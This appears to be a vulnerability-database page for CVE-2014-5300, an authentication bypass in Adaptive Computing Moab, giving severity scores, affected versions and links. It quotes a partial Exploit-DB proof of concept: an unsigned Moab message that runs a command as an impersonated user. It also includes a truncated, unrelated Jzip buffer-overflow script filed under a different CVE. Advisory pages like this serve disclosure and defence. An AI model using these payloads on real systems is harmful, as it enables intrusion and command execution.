CVE-2014-5300
published 2014-10-08CVE-2014-5300: Adaptive Computing Moab before 7.2.9 and 8 before 8.0.0 allows remote attackers to bypass the signature check, impersonate arbitrary users, and execute…
PriorityP343medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
7.36%
93.6th percentile
Adaptive Computing Moab before 7.2.9 and 8 before 8.0.0 allows remote attackers to bypass the signature check, impersonate arbitrary users, and execute commands via a message without a signature.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adaptivecomputing | moab | <= 7.2.8 | — |
| adaptivecomputing | moab | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Moab < 7.2.9 - Authentication Bypass
exploitdb·2014-10-02·CVSS 5.0
CVE-2014-5300 [MEDIUM] Moab < 7.2.9 - Authentication Bypass
Moab
7v49VzAlbyNQ4O3VChCus+v2LeE=
QG13cmxhYnMgRWFzdGVyIEVnZyE=
job
test
test
test
/home/test
2
/usr/bin/id
PBS
\START/usr/bin/id\0a\0a
Contained within this message is a element, which contains both a and elements. The is simply a SHA1 sum of the element. The , however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected.
However, whilst an incorrect SignatureValue results in a rejected message, it was found that if no s
Exploit-DB
Jzip - Buffer Overflow (PoC) (SEH Unicode)
exploitdb·2014-04-16
CVE-2010-5300 Jzip - Buffer Overflow (PoC) (SEH Unicode)
Jzip - Buffer Overflow (PoC) (SEH Unicode)
---
#!/usr/bin/python
######################################################
# Exploit title: seh unicode buffer overflow (DOS)
# Date: 16/04/2014
# Exploit Author: motaz reda [motazkhodair[at]gmail.com]
# Software Link : http://www.jzip.com/
# Version: jZip v2.0.0.132900
# Tested On: Windows 7 ultimate
########################################################
import sys, os
filename = "vuln.zip"
buffer = "\x50\x4B\x03\x04\x14\x00\x00"
buffer += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\xe4\x0f"
buffer += "\x00\x00\x00"
eo = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eo += "\x12\x10\x00\x00"
eo += "\x02\x10\x00\x00"
eo += "\x00\x00"
cdf = "\x50\x4B\x01\x02\x14\x00\x14"
cdf +=
No writeups or analysis indexed.
http://packetstormsecurity.com/files/128483/Moab-Dynamic-Configuration-Authentication-Bypass.htmlhttp://www.adaptivecomputing.com/security-advisory/http://www.exploit-db.com/exploits/34865http://www.securityfocus.com/archive/1/533574/100/0/threadedhttp://www.securityfocus.com/bid/70173https://exchange.xforce.ibmcloud.com/vulnerabilities/96699http://packetstormsecurity.com/files/128483/Moab-Dynamic-Configuration-Authentication-Bypass.htmlhttp://www.adaptivecomputing.com/security-advisory/http://www.exploit-db.com/exploits/34865http://www.securityfocus.com/archive/1/533574/100/0/threadedhttp://www.securityfocus.com/bid/70173https://exchange.xforce.ibmcloud.com/vulnerabilities/96699
2014-10-08
Published